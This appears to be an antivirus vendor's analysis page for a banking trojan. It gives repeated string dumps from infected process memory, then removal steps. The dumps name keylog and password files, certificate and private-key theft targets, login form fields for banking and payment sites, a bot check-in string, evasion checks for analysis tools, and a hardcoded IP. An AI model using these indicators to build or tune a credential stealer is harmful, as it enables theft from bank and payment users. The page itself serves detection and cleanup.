Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

conhost.exe_2168_rwx_014D0000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_2560_rwx_005F0000_00056000:

svchost.exe_2560_rwx_00650000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
LOCALSERVICE!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

conhost.exe_3956_rwx_00250000_00056000:

conhost.exe_3956_rwx_002B0000_00065000:

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2512

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
    C:\Windows\AppPatch\xodaql.exe (2837 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
